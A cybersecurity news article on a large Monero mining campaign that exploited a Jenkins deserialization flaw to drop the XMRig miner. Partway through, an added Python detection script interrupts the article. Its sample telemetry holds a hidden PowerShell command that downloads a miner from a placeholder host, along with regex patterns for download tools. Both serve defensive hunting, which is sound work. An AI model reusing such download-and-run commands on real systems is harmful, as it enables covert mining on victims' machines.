
Biggest Crypto-Mining Campaign Ever – Hackers Mine $3 Million Worth of Monero Crypto-currency

Security researchers from Check Point discovered the largest Monero mining campaign seen so far, one that uses the XMRig miner on various versions of Windows machines.

The hacker group has earned more than $3 million worth of Monero coins, and to speed up their mining they are now targeting powerful Jenkins CI servers.

Over the past few years, cryptocurrency mining has become a very easy way for cybercriminals to generate large revenue: they hijack the web browser, inject a malicious script, and take control of the victim's CPU.


Mining cryptocurrency legitimately is a resource-intensive process, so attackers instead demand ransom payments and infect other computers to mine cryptocurrency for them.

How Attackers Inject Monero Mining Payloads

To install the Monero mining payload, attackers leverage the known vulnerability CVE-2017-1000353 in the Jenkins Java deserialization implementation, which accepts any serialized object.

Attackers exploit the vulnerability by sending multiple successive session requests to the CLI interface.

Researchers said: “After the first request, the second request that contains crafted packets will be sent immediately. The first request is to identify the client capabilities and the second one consists of the Monero miner payload”.

The malicious code launches a hidden PowerShell to run scripts in the background and downloads the final Monero miner payload, minerxmr.exe, to the Windows server. Later, a start command is executed to begin the mining process:

START C:\Windows\minerxmr.exe
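One way a defender could hunt for the chain described above (the Jenkins process spawning a shell, a hidden PowerShell pulling down a file, and minerxmr.exe executing) across process-creation telemetry. This is an added example, not code from the article or from Check Point; it assumes Sysmon-style events carrying parent image, image and command line, that the Jenkins controller runs as java.exe, and the sample events below are constructed with placeholder hosts.

```python
"""Flag process-creation events matching the Jenkins-to-miner chain described in the article."""
import re

# Constructed sample events in a Sysmon Event ID 1 shape (parent image, image, command line).
# The download host and pool host are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": ('cmd.exe /c powershell -w hidden -nop -c "(New-Object Net.WebClient)'
                 ".DownloadFile('http://PLACEHOLDER-HOST/m.exe', 'C:\\Windows\\minerxmr.exe')\"")},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\minerxmr.exe",
     "cmdline": r"C:\Windows\minerxmr.exe -o PLACEHOLDER-POOL:3333"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe build.log"},
    {"parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c git fetch --all"},
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
                      r"start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
# The miner file name from the article, plus any binary carrying the XMRig name.
MINER_NAME = re.compile(r"\\(minerxmr|xmrig)[^\\]*\.exe$", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule the event trips (empty list = nothing suspicious)."""
    hits = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    # Rule 1: the Jenkins JVM (assumed to run as java.exe) spawning a shell. Build steps do
    # this legitimately, so on its own this is a low-confidence signal to correlate with others.
    if parent == "java.exe" and image in ("cmd.exe", "powershell.exe"):
        hits.append("java_spawns_shell")
    # Rule 2: PowerShell started with a hidden window together with a download primitive.
    if "powershell" in cmd.lower() and HIDDEN.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("hidden_powershell_download")
    # Rule 3: the miner binary itself executing.
    if MINER_NAME.search(event["image"]):
        hits.append("xmr_miner_executed")
    return hits


def scan(events):
    """Map event index -> rule names, keeping only events that tripped at least one rule."""
    results = ((i, classify(e)) for i, e in enumerate(events))
    return {i: names for i, names in results if names}
```

Rule 1 alone fires on ordinary build steps (the fourth sample event shows this); it is the combination with a hidden download and a miner-named binary executing on the same host that marks the chain.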

Researchers said “The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions.”

The mining operation is well planned and executed in the wild: the attackers used a number of mining pools to collect payments from victims, but all the funds were deposited into only one wallet. As of now, $3 million has been mined.

2017 was the year of data breaches and ransomware; now attackers have shifted their focus to crypto-mining attacks that use victims' resources. Since the start of 2018, a number of crypto-mining attacks have been launched to mine Monero cryptocurrency.

Last week, attackers hijacked 4,275 websites to inject the Coinhive Monero miner, including websites of government authorities (ico.org.uk), an NHS Foundation (nhs.uk), and uscourts.gov.

More than 500 million computers are mining cryptocurrency in their browsers without the user's knowledge, and Chrome extensions have also started mining cryptocurrency.

The Oracle WebLogic vulnerability (CVE-2017-10271) has also been abused to run crypto miners, hijacking the servers' processing power to mine Monero coins and causing a spike in CPU usage.

IoC

Domain and IP:


File:

Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.